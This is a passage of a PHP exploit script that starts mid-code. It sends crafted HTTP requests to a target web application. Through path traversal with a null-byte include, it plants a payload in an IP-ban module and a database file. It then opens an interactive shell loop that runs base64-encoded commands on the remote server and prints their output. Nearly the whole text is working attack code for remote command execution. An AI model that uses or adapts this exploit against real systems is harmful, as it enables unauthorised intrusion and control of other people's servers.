')) { return false; } else { return true; } } function send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused, try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function post_shell() { global $host,$path; $post = "add_ip=" . urlencode('') . "&action=add&mod=ipban"; $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($post)."\r\n\r\n"; $data .= "$post\r\n\r\n"; send ($host,$data); } function use_shell() { while (1) { echo "[Shell]~$: "; $cmd = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n"); print exec_cmd($cmd); } } function exec_cmd($cmd) { global $host,$path; $cmd = base64_encode($cmd); $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: close\r\n\r\n"; $html = send ($host,$data); preg_match_all('/(.*)<\/code>/si', $html, $match); return $match[1][0]; } ?>